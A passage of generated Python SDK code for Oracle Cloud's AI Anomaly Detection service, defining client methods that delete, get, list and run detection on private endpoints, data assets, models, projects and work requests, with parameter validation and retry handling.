:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_ai_private_endpoint.py.html>`__ to see an example of how to use delete_ai_private_endpoint API.
"""
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_asset(self, data_asset_id, **kwargs):
"""
Deletes a DataAsset resource by identifier
:param str data_asset_id: (required)
The OCID of the Data Asset.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_data_asset.py.html>`__ to see an example of how to use delete_data_asset API.
"""
resource_path = "/dataAssets/{dataAssetId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_model(self, model_id, **kwargs):
"""
Deletes an ai model resource by identifier. This operation fails with a 409 error unless all associated resources are in a DELETED state. You must delete all associated resources before deleting a project.
:param str model_id: (required)
The OCID of the Model.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_model.py.html>`__ to see an example of how to use delete_model API.
"""
resource_path = "/models/{modelId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_project(self, project_id, **kwargs):
"""
Deletes a Project resource by identifier. This operation fails with a 409 error unless all associated resources (models deployments or data assets) are in a DELETED state. You must delete all associated resources before deleting a project.
:param str project_id: (required)
The OCID of the Project.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_project.py.html>`__ to see an example of how to use delete_project API.
"""
resource_path = "/projects/{projectId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def detect_anomalies(self, detect_anomalies_details, **kwargs):
"""
Make a detect call with an anomaly model and detection data
:param oci.ai_anomaly_detection.models.DetectAnomaliesDetails detect_anomalies_details: (required)
The input is either:
- JSON object in the request. This object is defined and SDK will generate the
object for it
- Data embedded as base64 string in format of either
- CSV
- JSON
If this option is chosen then customer has to provide the content of specified
CSV or JSON in base64 encoded string. The Embedded JSON will still has to be
in same format as inline request JSON
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.AnomalyDetectResult`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/detect_anomalies.py.html>`__ to see an example of how to use detect_anomalies API.
"""
resource_path = "/actions/detectAnomalies"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"detect_anomalies got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=detect_anomalies_details,
response_type="AnomalyDetectResult")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=detect_anomalies_details,
response_type="AnomalyDetectResult")
def get_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
"""
Gets a specific private reverse connection by identifier.
:param str ai_private_endpoint_id: (required)
Unique private reverse connection identifier.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.AiPrivateEndpoint`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_ai_private_endpoint.py.html>`__ to see an example of how to use get_ai_private_endpoint API.
"""
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AiPrivateEndpoint")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AiPrivateEndpoint")
def get_data_asset(self, data_asset_id, **kwargs):
"""
Gets a DataAsset by identifier
:param str data_asset_id: (required)
The OCID of the Data Asset.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_data_asset.py.html>`__ to see an example of how to use get_data_asset API.
"""
resource_path = "/dataAssets/{dataAssetId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
def get_model(self, model_id, **kwargs):
"""
Gets a Model by identifier
:param str model_id: (required)
The OCID of the Model.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Model`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_model.py.html>`__ to see an example of how to use get_model API.
"""
resource_path = "/models/{modelId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Model")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Model")
def get_project(self, project_id, **kwargs):
"""
Gets a Project by identifier
:param str project_id: (required)
The OCID of the Project.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_project.py.html>`__ to see an example of how to use get_project API.
"""
resource_path = "/projects/{projectId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Project")
def get_work_request(self, work_request_id, **kwargs):
"""
Gets the status of the work request with the given ID.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.WorkRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_work_request.py.html>`__ to see an example of how to use get_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
def list_ai_private_endpoints(self, compartment_id, **kwargs):
"""
Returns a list of all the AI private endpoints in the specified compartment.
:param str compartment_id: (required)
The ID of the compartment in which to list resources.
:param str lifecycle_state: (optional)
<b>Filter</b> results by the specified lifecycle state. Must be a valid
state for the resource type.
Allowed values are: "CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED"
:param str display_name: (optional)
A filter to return only resources that match the entire display name given.
:param str id: (optional)
unique AiPrivateEndpoint identifier
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for timeCreated is descending. Default order for displayName is ascending. If no value is specified timeCreated is default.
Allowed values are: "timeCreated", "displayName"
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.AiPrivateEndpointCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_ai_private_endpoints.py.html>`__ to see an example of how to use list_ai_private_endpoints API.
"""
resource_path = "/aiPrivateEndpoints"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"lifecycle_state",
"display_name",
"id",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_ai_private_endpoints got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"lifecycleState": kwargs.get("lifecycle_state", missing),
"displayName": kwargs.get("display_name", missing),
"id": kwargs.get("id", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="AiPrivateEndpointCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="AiPrivateEndpointCollection")
def list_data_assets(self, compartment_id, **kwargs):
"""
Returns a list of DataAssets.
:param str compartment_id: (required)
The ID of the compartment in which to list resources.
:param str project_id: (optional)
The ID of the project for which to list the objects.
:param str display_name: (optional)
A filter to return only resources that match the entire display name given.
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str lifecycle_state: (optional)
<b>Filter</b> results by the specified lifecycle state. Must be a valid
state for the resource type.
Allowed values are: "ACTIVE", "DELETED"
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for timeCreated is descending. Default order for displayName is ascending. If no value is specified timeCreated is default.
Allowed values are: "timeCreated", "displayName"
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
